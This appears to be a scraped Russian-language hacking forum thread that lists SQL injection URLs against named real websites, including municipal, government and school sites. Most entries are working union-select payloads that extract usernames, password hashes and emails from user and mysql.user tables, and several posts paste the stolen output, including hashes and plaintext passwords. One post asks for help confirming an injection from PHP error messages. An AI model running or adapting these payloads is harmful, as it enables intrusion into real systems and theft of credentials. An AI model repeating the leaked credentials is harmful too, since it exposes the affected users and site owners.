http://www.buggenhout.be/ Code: http://www.buggenhout.be/dienst.asp?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarchar)+from+SEC_USER)-- http://www.brecht.be/ Code: http://www.brecht.be/dienst.asp?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarchar)+from+SEC_USER)--
http://www.dynamomania.com http://www.dynamomania.com http://www.dynamomania.com/news.php?p=message&id=-31370+union+select+1,2,3,concat_ws(char(58),name,pwd,email),5,6+from+users/*
http://www.greenshift.com/ http://www.greenshift.com/ http://www.greenshift.com/news.php?id=-97+union+select+1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12+from+mysql.user/* root:*3AE51E09E8B6540D267826C97259B607120DB332
chicken.org.au HTML: http://www.chicken.org.au/page.php?id=-4+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),6,7,8,9,10,11,12/* USER:[email protected] VERSION:4.0.24-nt-max-log DATABASE:vs28054_1 HTML: http://www.chicken.org.au/page.php?id=-4+union+select+0,1,2,3,4,concat(id,0x3a,login,0x3a,password),6,7,8,9,10,11,12+from+users/* Таблица - users Поля - id,login,password 13:Sarah:sanchez
http://www.tuner.be/ вывод в тайтле Code: http://www.tuner.be/actu.asp?id=-1+union+select+1,2,3,convert(concat_ws(0x3a,user(),database(),version())+using+latin1),5,6,7,8,9,10,11,12,13/*
www.a2k.org.ua http://www.a2k.org.ua http://www.a2k.org.ua/news.php?id=-1567+union+select+1,2,3,4,concat_ws(char(58),user,password,email),6,7,8,9,10,11,12,13,14,15,16,17,18,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+users+limit+1,0/*&lng=ua admin:d23d8b79f575bcc0eedfb8c4e2f13540:repz
www.voladm.gov.ua http://www.voladm.gov.ua http://www.voladm.gov.ua/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(login,char(58),pass),12,13,14+from+users+limit+2,50/*&today=2006.01.24&lang=ukr Roma:4cb3ab8dc96cc4bb7a5ccd4bb8b57199:gh237 пароли не знаю от чего...
laurenceschool.com HTML: http://www.laurenceschool.com/page.php?id=-13+union+select+1,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1)/*&title=Links USER:[email protected] VERSION:4.1.11-Debian_4sarge7 DATABASE:laurenceschool_com_-_base dalelane.co.uk Microsoft Access Ни одной стандартной таблици Только раскрытие путей и 13 столбцов. HTML: http://dalelane.co.uk/page.php?id=918+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12+from+msysobjects+in+'.'
Вопрос про sql-injection. Вот недавно проверял один сайт и вроде бы нашол sql injection. Вот 2 примера из сайта: 1. я набрал этот url : http://www.site.com/script.php?file=2-1' Получил ответ : Warning: imagecreatefromjpeg() [function.imagecreatefromjpeg]: Unable to access 2-1 in /home/site.com/script.php on line 3 Warning: imagecreatefromjpeg(2-1) [function.imagecreatefromjpeg]: failed to open stream: No such file or directory in /home/site.com/script.php on line 3 Warning: imagesx(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 4 Warning: imagesy(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 5 Warning: imagecopyresized(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 23 Warning: imagedestroy(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 25 -------------------- это первый пример вопросы от меня: 1. есть ли sql injection? 2. если да,то можете пример дать? info: што в красном цвете,это текст который я водил в url (2-1') -------------------- Второй пример: http://www.site.com/forum.php?id=4686&start=20' Ответ: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site.com/forum.php on line 439 ------------------ вопросы от меня: 1. есть ли sql injection? 2. если да,то можете пример дать? Зарание спасибо за ответы!
Code: http://russian.tebyan.net/Sites/default.php?id=-5898+UNION+SELECT+1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15+FROM+mysql.user/*
www.centurymedia.com http://www.centurymedia.com/ http://www.centurymedia.com/us/news.php?artist_ID=-31+union+select+1,2,3,user,5,6+from+mysql.user/*